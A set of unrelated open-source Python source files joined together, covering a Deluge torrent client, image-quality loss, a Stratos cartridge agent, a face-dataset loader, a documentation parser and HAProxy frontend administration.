request = Url.request(url, post_data=post_data, headers=DelugeWeb.headers)
request.add_header('cookie', DelugeWeb.cookie)
try:
response = DelugeWeb._read(Url.open(request))
if response['result'] is True:
downloadid = Torrent.get_hash(data['torrentfile'])
return {'response': True, 'downloadid': downloadid}
else:
return {'response': False, 'error': response['error']}
except (SystemExit, KeyboardInterrupt):
raise
except Exception, e:
logging.error(u'Delugeweb add_torrent', exc_info=True)
return {'response': False, 'error': str(e)[1:-1]}
@staticmethod
def _get_torrent_file(torrent_url, deluge_url):
command = {'method': 'web.download_torrent_from_url',
'params': [torrent_url],
'id': DelugeWeb.command_id
}
DelugeWeb.command_id += 1
post_data = json.dumps(command)
request = Url.request(deluge_url, post_data=post_data, headers=DelugeWeb.headers)
request.add_header('cookie', DelugeWeb.cookie)
try:
response = DelugeWeb._read(Url.open(request))
if response['error'] is None:
return {'response': True, 'torrentfile': response['result']}
except (SystemExit, KeyboardInterrupt):
raise
except Exception, e: #noqa
logging.error(u'Delugeweb download_torrent_from_url', exc_info=True)
return {'response': False, 'error': str(e)[1:-1]}
@staticmethod
def _get_download_dir(url):
command = {'method': 'core.get_config_value',
'params': ['download_location'],
'id': DelugeWeb.command_id
}
DelugeWeb.command_id += 1
post_data = json.dumps(command)
request = Url.request(url, post_data=post_data, headers=DelugeWeb.headers)
request.add_header('cookie', DelugeWeb.cookie)
try:
response = DelugeWeb._read(Url.open(request))
return response['result']
except Exception, e:
logging.error(u'delugeweb get_download_dir', exc_info=True)
return {'response': False, 'error': str(e.reason)[1:-1]}
@staticmethod
def _read(response):
''' Reads gzipped json response into dict
'''
return json.loads(zlib.decompress(response, 16+zlib.MAX_WBITS))
@staticmethod
def _login(url, password):
command = {'method': 'auth.login',
'params': [password],
'id': DelugeWeb.command_id
}
DelugeWeb.command_id += 1
post_data = json.dumps(command)
request = Url.request(url, post_data, headers=DelugeWeb.headers)
try:
response = urllib2.urlopen(request)
DelugeWeb.cookie = response.headers.get('Set-Cookie')
if DelugeWeb.cookie is None:
return 'Incorrect password.'
if response.msg == 'OK':
return True
else:
return response.msg
except (SystemExit, KeyboardInterrupt):
raise
except Exception, e:
logging.error(u'DelugeWeb test_connection', exc_info=True)
return u'{}.'.format(e.reason)
|
fatiando/gridder/__init__.py | XuesongDing/fatiando | 179 | 11087031 | """
Create and operate on data grids, scatters, and profiles.
"""
from __future__ import absolute_import
from .slicing import inside, cut
from .interpolation import interp, interp_at, profile
from .padding import pad_array, unpad_array, pad_coords
from .point_generation import regular, scatter, circular_scatter
from .utils import spacing
|
loss/IQA/gmsd.py | milesgray/CALAE | 203 | 11087034 | import torch
from torch import nn
from torch.nn import functional as F
import numpy as np
from torchvision import transforms
class GMSD(nn.Module):
# Refer to http://www4.comp.polyu.edu.hk/~cslzhang/IQA/GMSD/GMSD.htm
def __init__(self, channels=3):
super(GMSD, self).__init__()
self.channels = channels
dx = (torch.Tensor([[1,0,-1],[1,0,-1],[1,0,-1]])/3.).unsqueeze(0).unsqueeze(0).repeat(channels,1,1,1)
dy = (torch.Tensor([[1,1,1],[0,0,0],[-1,-1,-1]])/3.).unsqueeze(0).unsqueeze(0).repeat(channels,1,1,1)
self.dx = nn.Parameter(dx, requires_grad=False)
self.dy = nn.Parameter(dy, requires_grad=False)
self.aveKernel = nn.Parameter(torch.ones(channels,1,2,2)/4., requires_grad=False)
def gmsd(self, img1, img2, T=170):
Y1 = F.conv2d(img1, self.aveKernel, stride=2, padding =0, groups = self.channels)
Y2 = F.conv2d(img2, self.aveKernel, stride=2, padding =0, groups = self.channels)
IxY1 = F.conv2d(Y1, self.dx, stride=1, padding =1, groups = self.channels)
IyY1 = F.conv2d(Y1, self.dy, stride=1, padding =1, groups = self.channels)
gradientMap1 = torch.sqrt(IxY1**2 + IyY1**2+1e-12)
IxY2 = F.conv2d(Y2, self.dx, stride=1, padding =1, groups = self.channels)
IyY2 = F.conv2d(Y2, self.dy, stride=1, padding =1, groups = self.channels)
gradientMap2 = torch.sqrt(IxY2**2 + IyY2**2+1e-12)
quality_map = (2*gradientMap1*gradientMap2 + T)/(gradientMap1**2+gradientMap2**2 + T)
score = torch.std(quality_map.view(quality_map.shape[0],-1),dim=1)
return score
def forward(self, y, x, as_loss=True):
assert x.shape == y.shape
x = x * 255
y = y * 255
if as_loss:
score = self.gmsd(x, y)
return score.mean()
else:
with torch.no_grad():
score = self.gmsd(x, y)
return score
if __name__ == '__main__':
from PIL import Image
import argparse
from utils import prepare_image
parser = argparse.ArgumentParser()
parser.add_argument('--ref', type=str, default='images/r0.png')
parser.add_argument('--dist', type=str, default='images/r1.png')
args = parser.parse_args()
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
ref = prepare_image(Image.open(args.ref).convert("RGB")).to(device)
dist = prepare_image(Image.open(args.dist).convert("RGB")).to(device)
model = GMSD().to(device)
score = model(ref, dist, as_loss=False)
print('score: %.4f' % score.item())
# score: 0.1907
|
components/org.apache.stratos.python.cartridge.agent/src/main/python/cartridge.agent/cartridge.agent/agent.py | TanJay/stratos | 127 | 11087040 | #!/usr/bin/env python
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
import time
from threading import Thread
import publisher
from logpublisher import *
from modules.event.application.signup.events import *
from modules.event.domain.mapping.events import *
import modules.event.eventhandler as event_handler
from modules.event.instance.notifier.events import *
from modules.event.tenant.events import *
from modules.event.topology.events import *
from subscriber import EventSubscriber
class CartridgeAgent(object):
def __init__(self):
Config.initialize_config()
self.__terminated = False
self.__log = LogFactory().get_log(__name__)
mb_urls = Config.mb_urls.split(",")
mb_uname = Config.mb_username
mb_pwd = Config.mb_password
self.__inst_topic_subscriber = EventSubscriber(constants.INSTANCE_NOTIFIER_TOPIC, mb_urls, mb_uname, mb_pwd)
self.__tenant_topic_subscriber = EventSubscriber(constants.TENANT_TOPIC, mb_urls, mb_uname, mb_pwd)
self.__app_topic_subscriber = EventSubscriber(constants.APPLICATION_SIGNUP, mb_urls, mb_uname, mb_pwd)
self.__topology_event_subscriber = EventSubscriber(constants.TOPOLOGY_TOPIC, mb_urls, mb_uname, mb_pwd)
def run_agent(self):
# Start topology event receiver thread
self.register_topology_event_listeners()
if Config.lvs_virtual_ip is None or str(Config.lvs_virtual_ip).strip() == "":
self.__log.debug("LVS Virtual IP is not defined")
else:
event_handler.create_dummy_interface()
# request complete topology event from CC by publishing CompleteTopologyRequestEvent
publisher.publish_complete_topology_request_event()
# wait until complete topology message is received to get LB IP
self.wait_for_complete_topology()
# wait for member initialized event
while not Config.initialized:
self.__log.debug("Waiting for cartridge agent to be initialized...")
time.sleep(1)
# Start instance notifier listener thread
self.register_instance_topic_listeners()
# Start tenant event receiver thread
self.register_tenant_event_listeners()
# start application signup event listener
self.register_application_signup_event_listeners()
# request complete tenant event from CC by publishing CompleteTenantRequestEvent
publisher.publish_complete_tenant_request_event()
# Execute instance started shell script
event_handler.on_instance_started_event()
# Publish instance started event
publisher.publish_instance_started_event()
# Execute start servers extension
try:
event_handler.start_server_extension()
except Exception as ex:
self.__log.exception("Error processing start servers event: %s" % ex)
# check if artifact management is required before publishing instance activated event
repo_url = Config.repo_url
if repo_url is None or str(repo_url).strip() == "":
self.__log.info("No artifact repository found")
publisher.publish_instance_activated_event()
event_handler.on_instance_activated_event()
else:
# instance activated event will be published in artifact updated event handler
self.__log.info(
"Artifact repository found, waiting for artifact updated event to checkout artifacts: [repo_url] %s",
repo_url)
persistence_mapping_payload = Config.persistence_mappings
if persistence_mapping_payload is not None:
event_handler.volume_mount_extension(persistence_mapping_payload)
# start log publishing thread
log_publish_manager = None
if DataPublisherConfiguration.get_instance().enabled:
log_file_paths = Config.log_file_paths
if log_file_paths is None:
self.__log.exception("No valid log file paths found, no logs will be published")
else:
self.__log.debug("Starting Log Publisher Manager: [Log file paths] %s" % ", ".join(log_file_paths))
log_publish_manager = LogPublisherManager(log_file_paths)
log_publish_manager.start()
# run until terminated
while not self.__terminated:
time.sleep(5)
if DataPublisherConfiguration.get_instance().enabled:
log_publish_manager.terminate_all_publishers()
def terminate(self):
"""
Allows the CartridgeAgent thread to be terminated
:return: void
"""
self.__terminated = True
def register_instance_topic_listeners(self):
self.__log.debug("Starting instance notifier event message receiver thread")
self.__inst_topic_subscriber.register_handler("ArtifactUpdatedEvent", Handlers.on_artifact_updated)
self.__inst_topic_subscriber.register_handler("InstanceCleanupMemberEvent", Handlers.on_instance_cleanup_member)
self.__inst_topic_subscriber.register_handler(
"InstanceCleanupClusterEvent", Handlers.on_instance_cleanup_cluster)
self.__inst_topic_subscriber.start()
self.__log.info("Instance notifier event message receiver thread started")
# wait till subscribed to continue
while not self.__inst_topic_subscriber.is_subscribed():
time.sleep(1)
def register_topology_event_listeners(self):
self.__log.debug("Starting topology event message receiver thread")
self.__topology_event_subscriber.register_handler("MemberActivatedEvent", Handlers.on_member_activated)
self.__topology_event_subscriber.register_handler("MemberTerminatedEvent", Handlers.on_member_terminated)
self.__topology_event_subscriber.register_handler("MemberSuspendedEvent", Handlers.on_member_suspended)
self.__topology_event_subscriber.register_handler("CompleteTopologyEvent", Handlers.on_complete_topology)
self.__topology_event_subscriber.register_handler("MemberStartedEvent", Handlers.on_member_started)
self.__topology_event_subscriber.register_handler("MemberCreatedEvent", Handlers.on_member_created)
self.__topology_event_subscriber.register_handler("MemberInitializedEvent", Handlers.on_member_initialized)
self.__topology_event_subscriber.start()
self.__log.info("Cartridge agent topology receiver thread started")
# wait till subscribed to continue
while not self.__topology_event_subscriber.is_subscribed():
time.sleep(1)
def register_tenant_event_listeners(self):
self.__log.debug("Starting tenant event message receiver thread")
self.__tenant_topic_subscriber.register_handler("DomainMappingAddedEvent",
Handlers.on_domain_mapping_added)
self.__tenant_topic_subscriber.register_handler("DomainsMappingRemovedEvent",
Handlers.on_domain_mapping_removed)
self.__tenant_topic_subscriber.register_handler("CompleteTenantEvent", Handlers.on_complete_tenant)
self.__tenant_topic_subscriber.register_handler("TenantSubscribedEvent", Handlers.on_tenant_subscribed)
self.__tenant_topic_subscriber.start()
self.__log.info("Tenant event message receiver thread started")
# wait till subscribed to continue
while not self.__tenant_topic_subscriber.is_subscribed():
time.sleep(1)
def register_application_signup_event_listeners(self):
self.__log.debug("Starting application signup event message receiver thread")
self.__app_topic_subscriber.register_handler("ApplicationSignUpRemovedEvent",
Handlers.on_application_signup_removed)
self.__app_topic_subscriber.start()
self.__log.info("Application signup event message receiver thread started")
# wait till subscribed to continue
while not self.__app_topic_subscriber.is_subscribed():
time.sleep(1)
def wait_for_complete_topology(self):
while not TopologyContext.initialized:
self.__log.info("Waiting for complete topology event...")
time.sleep(5)
self.__log.info("Complete topology event received")
class Handlers(object):
"""
Handler methods for message broker events
"""
__log = LogFactory().get_log(__name__)
__tenant_context_initialized = False
@staticmethod
def on_artifact_updated(msg):
event_obj = ArtifactUpdatedEvent.create_from_json(msg.payload)
event_handler.on_artifact_updated_event(event_obj)
@staticmethod
def on_instance_cleanup_member(msg):
member_in_payload = Config.member_id
event_obj = InstanceCleanupMemberEvent.create_from_json(msg.payload)
member_in_event = event_obj.member_id
if member_in_payload == member_in_event:
event_handler.on_instance_cleanup_member_event()
@staticmethod
def on_instance_cleanup_cluster(msg):
event_obj = InstanceCleanupClusterEvent.create_from_json(msg.payload)
cluster_in_payload = Config.cluster_id
cluster_in_event = event_obj.cluster_id
instance_in_payload = Config.cluster_instance_id
instance_in_event = event_obj.cluster_instance_id
if cluster_in_event == cluster_in_payload and instance_in_payload == instance_in_event:
event_handler.on_instance_cleanup_cluster_event()
@staticmethod
def on_member_created(msg):
Handlers.__log.debug("Member created event received: %r" % msg.payload)
@staticmethod
def on_member_initialized(msg):
Handlers.__log.debug("Member initialized event received: %r" % msg.payload)
event_obj = MemberInitializedEvent.create_from_json(msg.payload)
if not TopologyContext.initialized:
return
event_handler.on_member_initialized_event(event_obj)
@staticmethod
def on_member_activated(msg):
Handlers.__log.debug("Member activated event received: %r" % msg.payload)
if not TopologyContext.initialized:
return
event_obj = MemberActivatedEvent.create_from_json(msg.payload)
event_handler.on_member_activated_event(event_obj)
@staticmethod
def on_member_terminated(msg):
Handlers.__log.debug("Member terminated event received: %r" % msg.payload)
if not TopologyContext.initialized:
return
event_obj = MemberTerminatedEvent.create_from_json(msg.payload)
event_handler.on_member_terminated_event(event_obj)
@staticmethod
def on_member_suspended(msg):
Handlers.__log.debug("Member suspended event received: %r" % msg.payload)
if not TopologyContext.initialized:
return
event_obj = MemberSuspendedEvent.create_from_json(msg.payload)
event_handler.on_member_suspended_event(event_obj)
@staticmethod
def on_complete_topology(msg):
event_obj = CompleteTopologyEvent.create_from_json(msg.payload)
TopologyContext.update(event_obj.topology)
if not TopologyContext.initialized:
TopologyContext.initialized = True
Handlers.__log.info("Topology initialized from complete topology event")
event_handler.on_complete_topology_event(event_obj)
Handlers.__log.debug("Topology context updated with [topology] %r" % event_obj.topology.json_str)
@staticmethod
def on_member_started(msg):
Handlers.__log.debug("Member started event received: %r" % msg.payload)
if not TopologyContext.initialized:
return
event_obj = MemberStartedEvent.create_from_json(msg.payload)
event_handler.on_member_started_event(event_obj)
@staticmethod
def on_domain_mapping_added(msg):
Handlers.__log.debug("Subscription domain added event received : %r" % msg.payload)
event_obj = DomainMappingAddedEvent.create_from_json(msg.payload)
event_handler.on_domain_mapping_added_event(event_obj)
@staticmethod
def on_domain_mapping_removed(msg):
Handlers.__log.debug("Subscription domain removed event received : %r" % msg.payload)
event_obj = DomainMappingRemovedEvent.create_from_json(msg.payload)
event_handler.on_domain_mapping_removed_event(event_obj)
@staticmethod
def on_complete_tenant(msg):
event_obj = CompleteTenantEvent.create_from_json(msg.payload)
TenantContext.update(event_obj.tenants)
if not Handlers.__tenant_context_initialized:
Handlers.__log.info("Tenant context initialized from complete tenant event")
Handlers.__tenant_context_initialized = True
event_handler.on_complete_tenant_event(event_obj)
Handlers.__log.debug("Tenant context updated with [tenant list] %r" % event_obj.tenant_list_json)
@staticmethod
def on_tenant_subscribed(msg):
Handlers.__log.debug("Tenant subscribed event received: %r" % msg.payload)
event_obj = TenantSubscribedEvent.create_from_json(msg.payload)
event_handler.on_tenant_subscribed_event(event_obj)
@staticmethod
def on_application_signup_removed(msg):
Handlers.__log.debug("Application signup removed event received: %r" % msg.payload)
event_obj = ApplicationSignUpRemovedEvent.create_from_json(msg.payload)
event_handler.on_application_signup_removed_event(event_obj)
def check_termination(agent_obj):
terminate = False
terminator_file_path = os.path.abspath(os.path.dirname(__file__)) + "/terminator.txt"
while not terminate:
time.sleep(60)
try:
with open(terminator_file_path, 'r') as f:
file_output = f.read()
terminate = True if "true" in file_output else False
except IOError:
pass
log.info("Shutting down Stratos cartridge agent...")
agent_obj.terminate()
if __name__ == "__main__":
log = LogFactory().get_log(__name__)
cartridge_agent = CartridgeAgent()
try:
log.info("Starting Stratos cartridge agent...")
task_thread = Thread(target=check_termination, args=(cartridge_agent,))
task_thread.start()
cartridge_agent.run_agent()
except Exception as e:
log.exception("Cartridge Agent Exception: %r" % e)
log.info("Terminating Stratos cartridge agent...")
cartridge_agent.terminate()
|
semanticpy/transform/transform.py | thecapacity/semanticpy | 116 | 11087048 | <reponame>thecapacity/semanticpy<filename>semanticpy/transform/transform.py
from semanticpy.matrix_formatter import MatrixFormatter
from scipy import array
class Transform:
def __init__(self, matrix):
self.matrix = array(matrix, dtype=float)
def __repr__(self):
MatrixFormatter(self.matrix).pretty_print
|
challenges/iccv21-mfr/dataset_mask.py | qaz734913414/insightface | 12,377 | 11087053 | import numbers
import os
import queue as Queue
import threading
import mxnet as mx
import numpy as np
import torch
from torch.utils.data import DataLoader, Dataset
from torchvision import transforms
import cv2
import albumentations as A
from albumentations.pytorch import ToTensorV2
from insightface.app import MaskAugmentation
class BackgroundGenerator(threading.Thread):
def __init__(self, generator, local_rank, max_prefetch=6):
super(BackgroundGenerator, self).__init__()
self.queue = Queue.Queue(max_prefetch)
self.generator = generator
self.local_rank = local_rank
self.daemon = True
self.start()
def run(self):
torch.cuda.set_device(self.local_rank)
for item in self.generator:
self.queue.put(item)
self.queue.put(None)
def next(self):
next_item = self.queue.get()
if next_item is None:
raise StopIteration
return next_item
def __next__(self):
return self.next()
def __iter__(self):
return self
class DataLoaderX(DataLoader):
def __init__(self, local_rank, **kwargs):
super(DataLoaderX, self).__init__(**kwargs)
self.stream = torch.cuda.Stream(local_rank)
self.local_rank = local_rank
def __iter__(self):
self.iter = super(DataLoaderX, self).__iter__()
self.iter = BackgroundGenerator(self.iter, self.local_rank)
self.preload()
return self
def preload(self):
self.batch = next(self.iter, None)
if self.batch is None:
return None
with torch.cuda.stream(self.stream):
for k in range(len(self.batch)):
self.batch[k] = self.batch[k].to(device=self.local_rank,
non_blocking=True)
def __next__(self):
torch.cuda.current_stream().wait_stream(self.stream)
batch = self.batch
if batch is None:
raise StopIteration
self.preload()
return batch
class MXFaceDataset(Dataset):
def __init__(self, root_dir, local_rank, aug_modes="brightness=0.1+mask=0.1"):
super(MXFaceDataset, self).__init__()
default_aug_probs = {
'brightness' : 0.2,
'blur': 0.1,
'mask': 0.1,
}
aug_mode_list = aug_modes.lower().split('+')
aug_mode_map = {}
for aug_mode_str in aug_mode_list:
_aug = aug_mode_str.split('=')
aug_key = _aug[0]
if len(_aug)>1:
aug_prob = float(_aug[1])
else:
aug_prob = default_aug_probs[aug_key]
aug_mode_map[aug_key] = aug_prob
transform_list = []
self.mask_aug = False
self.mask_prob = 0.0
key = 'mask'
if key in aug_mode_map:
self.mask_aug = True
self.mask_prob = aug_mode_map[key]
transform_list.append(
MaskAugmentation(mask_names=['mask_white', 'mask_blue', 'mask_black', 'mask_green'], mask_probs=[0.4, 0.4, 0.1, 0.1], h_low=0.33, h_high=0.4, p=self.mask_prob)
)
if local_rank==0:
print('data_transform_list:', transform_list)
print('mask:', self.mask_aug, self.mask_prob)
key = 'brightness'
if key in aug_mode_map:
prob = aug_mode_map[key]
transform_list.append(
A.RandomBrightnessContrast(brightness_limit=0.125, contrast_limit=0.05, p=prob)
)
key = 'blur'
if key in aug_mode_map:
prob = aug_mode_map[key]
transform_list.append(
A.ImageCompression(quality_lower=30, quality_upper=80, p=prob)
)
transform_list.append(
A.MedianBlur(blur_limit=(1,7), p=prob)
)
transform_list.append(
A.MotionBlur(blur_limit=(5,12), p=prob)
)
transform_list += \
[
A.HorizontalFlip(p=0.5),
A.Normalize(mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5]),
ToTensorV2(),
]
#here, the input for A transform is rgb cv2 img
self.transform = A.Compose(
transform_list
)
self.root_dir = root_dir
self.local_rank = local_rank
path_imgrec = os.path.join(root_dir, 'train.rec')
path_imgidx = os.path.join(root_dir, 'train.idx')
self.imgrec = mx.recordio.MXIndexedRecordIO(path_imgidx, path_imgrec, 'r')
s = self.imgrec.read_idx(0)
header, _ = mx.recordio.unpack(s)
#print(header)
#print(len(self.imgrec.keys))
if header.flag > 0:
if len(header.label)==2:
self.imgidx = np.array(range(1, int(header.label[0])))
else:
self.imgidx = np.array(list(self.imgrec.keys))
else:
self.imgidx = np.array(list(self.imgrec.keys))
#print('imgidx len:', len(self.imgidx))
def __getitem__(self, index):
idx = self.imgidx[index]
s = self.imgrec.read_idx(idx)
header, img = mx.recordio.unpack(s)
hlabel = header.label
#print('hlabel:', hlabel.__class__)
sample = mx.image.imdecode(img).asnumpy()
if not isinstance(hlabel, numbers.Number):
idlabel = hlabel[0]
else:
idlabel = hlabel
label = torch.tensor(idlabel, dtype=torch.long)
if self.transform is not None:
sample = self.transform(image=sample, hlabel=hlabel)['image']
return sample, label
def __len__(self):
return len(self.imgidx)
if __name__ == "__main__":
import argparse, cv2, copy
parser = argparse.ArgumentParser(description='dataset test')
parser.add_argument('--dataset', type=str, help='dataset path')
parser.add_argument('--samples', type=int, default=256, help='')
parser.add_argument('--cols', type=int, default=16, help='')
args = parser.parse_args()
assert args.samples%args.cols==0
assert args.cols%2==0
samples = args.samples
cols = args.cols
rows = args.samples // args.cols
dataset = MXFaceDataset(root_dir=args.dataset, local_rank=0, aug_modes='mask=1.0')
dataset.transform = A.Compose([t for t in dataset.transform if not isinstance(t, (A.Normalize, ToTensorV2))])
dataset_0 = copy.deepcopy(dataset)
#dataset_0.transform = None
dataset_1 = copy.deepcopy(dataset)
#dataset_1.transform = A.Compose(
# [
# A.RandomBrightnessContrast(brightness_limit=0.125, contrast_limit=0.05, p=1.0),
# A.ImageCompression(quality_lower=30, quality_upper=80, p=1.0),
# A.MedianBlur(blur_limit=(1,7), p=1.0),
# A.MotionBlur(blur_limit=(5,12), p=1.0),
# A.Affine(scale=(0.92, 1.08), translate_percent=(-0.06, 0.06), rotate=(-6, 6), shear=None, interpolation=cv2.INTER_LINEAR, p=1.0),
# ]
#)
fig = np.zeros( (112*rows, 112*cols, 3), dtype=np.uint8 )
for idx in range(samples):
if idx%2==0:
image, _ = dataset_0[idx//2]
else:
image, _ = dataset_1[idx//2]
row_idx = idx // cols
col_idx = idx % cols
fig[row_idx*112:(row_idx+1)*112, col_idx*112:(col_idx+1)*112,:] = image[:,:,::-1] # to bgr
cv2.imwrite("./datasets.png", fig)
|
3rd_party/occa/scripts/docs/api_docgen/file_parser.py | RonRahaman/nekRS | 312 | 11087072 | <filename>3rd_party/occa/scripts/docs/api_docgen/file_parser.py
'''
Parse doxygen output files
'''
from typing import Any, Dict, List, Tuple
from .types import *
from .system_commands import *
def alias_path(path: str,
node_id: str,
ordered_path_aliases: List[Tuple[str, str]]) -> Tuple[str, str]:
for (alias_path, alias_id) in ordered_path_aliases:
if path.startswith(alias_path):
return (
path.replace(path, alias_id),
f'{alias_id}.{node_id}',
)
return (path, node_id)
def get_global_id_map(tree: Any, nodes: List[Any]) -> Dict[str, str]:
paths = sorted([
[tree.getpath(node), Documentation.parse(node)]
for node in nodes
])
global_id_map = {}
ordered_path_ids: List[Tuple[str, str]] = []
for [path, node_info] in paths:
# Build aliases from short names -> long names
(aliased_path, aliased_id) = alias_path(
path,
node_info.id_,
ordered_path_ids
)
# Build the ids backwards to match longer -> shorter to find
# the longest alias possible
ordered_path_ids.insert(0, (aliased_path, aliased_id))
global_id_map[path] = aliased_id
return global_id_map
def get_doc_tree(filename: str) -> Dict[str, Any]:
(tree, root) = parse_xml_file(filename)
nodes = get_documented_definition_nodes(root)
global_id_map = get_global_id_map(tree, nodes)
doc_tree: Dict[str, Any] = {}
for node in nodes:
# Split by . and append a CHILDREN_FIELD in between
# Example:
# device.malloc
# ->
# ['device', CHILDREN_FIELD, 'malloc]
path = []
for entry in global_id_map[tree.getpath(node)].split('.'):
path.append(entry)
path.append(CHILDREN_FIELD)
path.pop()
doc_node = nested_get(doc_tree, path)
if DOC_FIELD not in doc_node:
doc_node[DOC_FIELD] = DocNode(
definitions=[],
)
doc_node[DOC_FIELD].definitions.append(
Definition.parse(node)
)
return doc_tree
def finalize_doc_tree(doc_tree: Dict[str, Any]) -> List[DocTreeNode]:
return [
DocTreeNode(
definitions=doc_info[DOC_FIELD].definitions,
children=finalize_doc_tree(
doc_info.get(CHILDREN_FIELD, {})
)
)
for doc_info in doc_tree.values()
]
def load_documentation() -> DocTree:
# Merge all documented files into one tree
doc_tree = {}
for documented_file in find_documented_files():
doc_tree.update(
get_doc_tree(documented_file)
)
return DocTree(
roots=finalize_doc_tree(doc_tree)
)
|
haproxyadmin/frontend.py | jrassier/haproxyadmin | 104 | 11087094 | # -*- coding: utf-8 -*-
#
# pylint: disable=superfluous-parens
#
"""
haproxyadmin.frontend
~~~~~~~~~~~~~~~~~~~~~
This module provides the :class:`Frontend <.Frontend>` class. This class can
be used to run operations on a frontend and retrieve statistics.
"""
from haproxyadmin.utils import (calculate, cmd_across_all_procs, converter,
check_command, should_die, compare_values)
FRONTEND_METRICS = [
'bin',
'bout',
'comp_byp',
'comp_in',
'comp_out',
'comp_rsp',
'dreq',
'dresp',
'ereq',
'hrsp_1xx',
'hrsp_2xx',
'hrsp_3xx',
'hrsp_4xx',
'hrsp_5xx',
'hrsp_other',
'rate',
'rate_lim',
'rate_max',
'req_rate',
'req_rate_max',
'req_tot',
'scur',
'slim',
'smax',
'stot',
]
class Frontend(object):
"""Build a user-created :class:`Frontend` for a single frontend.
:param frontend_per_proc: list of :class:`._Frontend` objects.
:type frontend_per_proc: ``list``
:rtype: a :class:`Frontend`.
"""
def __init__(self, frontend_per_proc):
self._frontend_per_proc = frontend_per_proc
self._name = self._frontend_per_proc[0].name
# built-in comparison operator is adjusted to support
# if 'x' in list_of_frontend_obj
# x == frontend_obj
def __eq__(self, other):
if isinstance(other, Frontend):
return (self.name == other.name)
elif isinstance(other, str):
return (self.name == other)
else:
return False
def __ne__(self, other):
return (not self.__eq__(other))
@property
def iid(self):
"""Return the unique proxy ID of the frontend.
.. note::
Because proxy ID is the same across all processes,
we return the proxy ID from the 1st process.
:rtype: ``int``
"""
return int(self._frontend_per_proc[0].iid)
@should_die
def disable(self):
"""Disable frontend.
:param die: control the handling of errors.
:type die: ``bool``
:return: ``True`` if frontend is disabled otherwise ``False``.
:rtype: bool
:raise: If ``die`` is ``True``
:class:`haproxyadmin.exceptions.CommandFailed` or
:class:`haproxyadmin.exceptions.MultipleCommandResults` is raised
when something bad happens otherwise returns ``False``.
"""
cmd = "disable frontend {}".format(self.name)
results = cmd_across_all_procs(self._frontend_per_proc, 'command', cmd)
return check_command(results)
@should_die
def enable(self):
"""Enable frontend.
:param die: control the handling of errors.
:type die: ``bool``
:return: ``True`` if frontend is enabled otherwise ``False``.
:rtype: bool
:raise: If ``die`` is ``True``
:class:`haproxyadmin.exceptions.CommandFailed` or
:class:`haproxyadmin.exceptions.MultipleCommandResults` is raised
when something bad happens otherwise returns ``False``.
"""
cmd = "enable frontend {}".format(self.name)
results = cmd_across_all_procs(self._frontend_per_proc, 'command', cmd)
return check_command(results)
def metric(self, name):
"""Return the value of a metric.
Performs a calculation on the metric across all HAProxy processes.
The type of calculation is either sum or avg and defined in
:data:`haproxyadmin.utils.METRICS_SUM` and
:data:`haproxyadmin.utils.METRICS_AVG`.
:param name: metric name to retrieve
:type name: any of :data:`haproxyadmin.haproxy.FRONTEND_METRICS`
:return: value of the metric
:rtype: ``integer``
:raise: ``ValueError`` when a given metric is not found
"""
if name not in FRONTEND_METRICS:
raise ValueError("{} is not valid metric".format(name))
metrics = [x.metric(name) for x in self._frontend_per_proc]
metrics[:] = (converter(x) for x in metrics)
metrics[:] = (x for x in metrics if x is not None)
return calculate(name, metrics)
@property
def maxconn(self):
"""Return the configured maximum connection allowed for frontend.
:rtype: ``integer``
"""
return self.metric('slim')
@should_die
def setmaxconn(self, value):
"""Set maximum connection to the frontend.
:param die: control the handling of errors.
:type die: ``bool``
:param value: max connection value.
:type value: ``integer``
:return: ``True`` if value was set.
:rtype: ``bool``
:raise: If ``die`` is ``True``
:class:`haproxyadmin.exceptions.CommandFailed` or
:class:`haproxyadmin.exceptions.MultipleCommandResults` is raised
when something bad happens otherwise returns ``False``.
Usage::
>>> from haproxyadmin import haproxy
>>> hap = haproxy.HAProxy(socket_dir='/run/haproxy')
>>> frontend = hap.frontend('frontend1_proc34')
>>> frontend.maxconn
>>> frontend.setmaxconn(50000)
True
>>> frontend.maxconn
100000
"""
if not isinstance(value, int):
raise ValueError("Expected integer and got {}".format(type(value)))
cmd = "set maxconn frontend {} {}".format(self.name, value)
results = cmd_across_all_procs(self._frontend_per_proc, 'command', cmd)
return check_command(results)
@property
def name(self):
"""Return the name of the frontend.
:rtype: ``string``
"""
return self._name
@property
def process_nb(self):
"""Return a list of process number in which frontend is configured.
:rtype: ``list``
Usage::
>>> from haproxyadmin import haproxy
>>> hap = haproxy.HAProxy(socket_dir='/run/haproxy')
>>> frontend = hap.frontend('frontend2_proc34')
>>> frontend.process_nb
[4, 3]
"""
process_numbers = []
for frontend in self._frontend_per_proc:
process_numbers.append(frontend.process_nb)
return process_numbers
@property
def requests(self):
"""Return the number of requests.
:rtype: ``integer``
Usage::
>>> from haproxyadmin import haproxy
>>> hap = haproxy.HAProxy(socket_dir='/run/haproxy')
>>> frontend = hap.frontend('frontend2_proc34')
>>> frontend.requests
5
"""
return self.metric('req_tot')
def requests_per_process(self):
"""Return the number of requests for the frontend per process.
:return: a list of tuples with 2 elements
#. process number of HAProxy
#. requests
:rtype: ``list``
Usage::
>>> from haproxyadmin import haproxy
>>> hap = haproxy.HAProxy(socket_dir='/run/haproxy')
>>> frontend = hap.frontend('frontend2_proc34')
>>> frontend.requests_per_process()
[(4, 2), (3, 3)]
"""
results = cmd_across_all_procs(self._frontend_per_proc, 'metric',
'req_tot')
return results
@should_die
def shutdown(self):
"""Disable the frontend.
.. warning::
HAProxy removes from the running configuration a frontend, so
further operations on the frontend will return an error.
:rtype: ``bool``
"""
cmd = "shutdown frontend {}".format(self.name)
results = cmd_across_all_procs(self._frontend_per_proc, 'command', cmd)
return check_command(results)
def stats_per_process(self):
"""Return all stats of the frontend per process.
:return: a list of tuples with 2 elements
#. process number
#. a dict with all stats
:rtype: ``list``
"""
results = cmd_across_all_procs(self._frontend_per_proc, 'stats')
return results
@property
def status(self):
"""Return the status of the frontend.
:rtype: ``string``
:raise: :class:`IncosistentData` exception if status is different
per process
Usage::
